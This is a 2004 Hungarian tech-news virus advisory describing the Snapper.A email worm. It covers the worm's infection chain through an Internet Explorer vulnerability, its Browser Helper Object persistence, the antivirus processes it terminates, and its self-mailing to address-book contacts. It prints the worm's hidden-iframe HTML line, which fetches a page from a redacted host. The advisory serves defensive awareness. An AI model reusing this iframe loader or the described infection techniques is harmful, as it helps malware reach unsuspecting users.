Dotkom
Üres oldalnak látszó üzenet mögé bújik a ravasz Snapper féregvírus
A Snapper A változata egy Internet Explorer sebezhetőséget igyekszik kihasználni, hogy megtévessze a gyanútlan felhasználókat.
A fertőzött e-mail jellemzői
Feladó: [hamis e-mailcím]
Tárgy: Re:
Tartalom: a következő HTML-kódot tartalmazza, mely a legtöbb e-mailkliensben egy üres oldalt jelenít meg:
[HTML][BODY][IFRAME src=´http://[törölve]/banner.htm´ style=´display:none´][/IFRAME][/HTML][/BODY]
A fenti révén letölti és megjeleníti a Banner.htm-et.
A féreg paraméterei
Felfedezésének ideje: 2004. március 24.
Utolsó frissítés ideje: 2004. március 24.
Veszélyeztetett rendszerek: Windows 9x/Me/NT/2k/XP
Nem érintett rendszerek: Windows 3.x, Microsoft IIS, Macintosh, UNIX, Linux, OS/2
Mérete: 9 Kbyte
Fertőzések száma: 0-49
Földrajzi elterjedtsége: alacsony
Károkozás mértéke: alacsony
Eltávolítása: nehéz
Aktiválódása esetén lezajló események
Tartalmaz egy ieload.dll állományt, mely vagy a Windows vagy a System könyvtárba kerül. Ez a következőket teszi:
– bemásolja magát a System könyvtárba ieload.dll néven
– önmagát Browser Helper Objectként regisztrálja; ez lehetővé teszi, hogy a féreg lefusson, amikor az Internet Explorer megnyitásra kerül
– a fenti elérése érdekében létrehozza a HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Browser Helper Objects/[véletlenszerű clsid]HKEY_CLASSES_ROOT/CLSID/[véletlenszerű clsid] Registry kulcsot a rendszerleíró adatbázisban, ahol a [véletlenszerű clsid] értéke egy véletlenszerű érték, mely a következő formában jelenhet meg: {########-####-####-####-############}
– létrehozza a következő Registry bejegyzéseket, hogy eltárolja a konfigurációs információkat:
. HKEY_CURRENT_CONFIG/Software/Microsoft/Windows/CurrentVersion/Internet Settings/PopupsLoaded
. HKEY_CURRENT_CONFIG/Software/Microsoft/Windows/CurrentVersion/Internet Settings/TimerTicks
– leállítja a következő process-eket (ha azok futnak):
. NAVAPW32.EXE
. CCAPP.EXE
. OUTPOST.EXE
. SPIDERML.EXE
– rendszeres időközönként felveszi a kapcsolatot a 80-as TCP porton keresztül egy webszerverrel
– saját SMTP-motorja révén továbbítja magát a Windows Address Bookjában található összes kontakt számára
Banner.htm
A vírusinformáció készítésének időpontjában a Banner.htm weblap üresnek tűnik, de linkeket tartalmaz a féregre. Az oldal egyébként kihasználja az Internet Explorer Object Tag Vulnerability nevű sérülékenységet annak érdekében, hogy letöltsön egy ártó szándékú HTML-file-t, a Htmlhelp.cgi-t.
Htmlhelp.cgi
Ez egy olyan HTML-állomány, mely a féreg .dll file-ját kódolt formában tartalmazza; ez az állomány tartalmaz egy VBScriptet, mely a férget a ieload.dll néven a Windows könyvtárba telepíti.
[fbcomments url="https://www.technokrata.hu/egazdasag/dotkom/2004/03/26/ures-oldalnak-latszo-uzenet-moge-bujik-a-ravasz-snapper-feregvirus/" width="800" count="off" num="3" countmsg=""]
